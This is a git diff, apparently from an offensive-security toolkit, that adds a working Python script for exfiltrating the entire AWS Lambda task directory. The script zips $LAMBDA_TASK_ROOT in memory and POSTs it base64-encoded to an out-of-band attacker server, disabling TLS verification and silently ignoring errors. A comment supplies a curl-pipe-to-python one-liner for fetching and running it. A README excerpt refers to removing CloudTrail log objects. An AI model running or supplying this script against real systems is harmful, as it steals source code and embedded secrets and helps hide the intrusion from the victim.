diff --git a/clouds/aws/README.md b/clouds/aws/README.md index 75d529c..a3eeba8 100644 --- a/clouds/aws/README.md +++ b/clouds/aws/README.md @@ -93,4 +93,6 @@ Afterwards, one should see following logs in CloudWatch traces for planted Lambd [*] Following S3 object could be removed: (Bucket=90112981864022885796153088027941100000000000000000000000, Key=cloudtrail/AWSLogs/712800000000/CloudTrail/us-west-2/2019/03/20/712800000000_CloudTrail_us-west-2_20190320T1000Z_oxxxxxxxxxxxxc.json.gz) ``` +- **`exfiltrateLambdaTasksDirectory.py`** - Script that creates an in-memory ZIP file from the entire directory `$LAMBDA_TASK_ROOT` (typically `/var/task`) and sends it out in a form of HTTP(S) POST request, within an `exfil` parameter. To be used for exfiltrating AWS Lambda's entire source code. + - **`identifyS3Bucket.rb`** - This script attempts to identify passed name whether it resolves to a valid AWS S3 Bucket via different means. This script may come handy when revealing S3 buckets hidden behind HTTP proxies. diff --git a/clouds/aws/exfiltrateLambdaTasksDirectory.py b/clouds/aws/exfiltrateLambdaTasksDirectory.py new file mode 100755 index 0000000..a128f71 --- /dev/null +++ b/clouds/aws/exfiltrateLambdaTasksDirectory.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python +# +# This script can be used to exfiltrate all of the AWS Lambda source files from +# $LAMBDA_TASK_ROOT (typically: /var/task) in a form of out-of-band http/s POST +# request. Such request will contain an `exfil` variable with urlencode(base64(zip_file)) in it. +# This zip file then will contain all of the $LAMBDA_TASK_ROOT (/var/task) directory contents. +# +# Can be used with webhook.site, using similar OS command as following: +# +# $ curl -s https:///exfiltrateLambdaTasksDirectory.py | python +# +# Author: Mariusz B., '19, +# + +import zipfile, StringIO +import base64, os, sys +import urllib, urllib2, ssl + +# +# Set below address to the HTTP(S) web server that will receive exfiltrated +# ZIP file in a form of a HTTP POST request (within parameter 'exfil') +# +EXFILTRATE_OUTBAND_ADDRESS = 'https:///lambda-exfil' + + +class InMemoryZip(object): + # Source: + # - https://www.kompato.com/post/43805938842/in-memory-zip-in-python + # - https://stackoverflow.com/a/2463818 + + def __init__(self): + self.in_memory_zip = StringIO.StringIO() + + def append(self, filename_in_zip, file_contents): + zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False) + zf.writestr(filename_in_zip, file_contents) + for zfile in zf.filelist: + zfile.create_system = 0 + + return self + + def read(self): + self.in_memory_zip.seek(0) + return self.in_memory_zip.read() + +def fetch_files(imz, rootdir): + for folder, subs, files in os.walk(rootdir): + for filename in files: + real_path = os.path.join(folder, filename) + with open(real_path, 'r') as src: + zip_path = real_path.replace(rootdir + '/', '') + imz.append(zip_path, src.read()) + +def post(data): + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + } + + data = {'exfil': base64.b64encode(data)} + data = urllib.urlencode(data) + + ssl._create_default_https_context = ssl._create_unverified_context + r = urllib2.Request(EXFILTRATE_OUTBAND_ADDRESS, data=data, headers=headers) + resp = urllib2.urlopen(r) + if resp: resp.read() + +def main(): + rootdir = os.environ['LAMBDA_TASK_ROOT'] + imz = InMemoryZip() + fetch_files(imz, rootdir) + post(imz.read()) + +try: + main() +except: + pass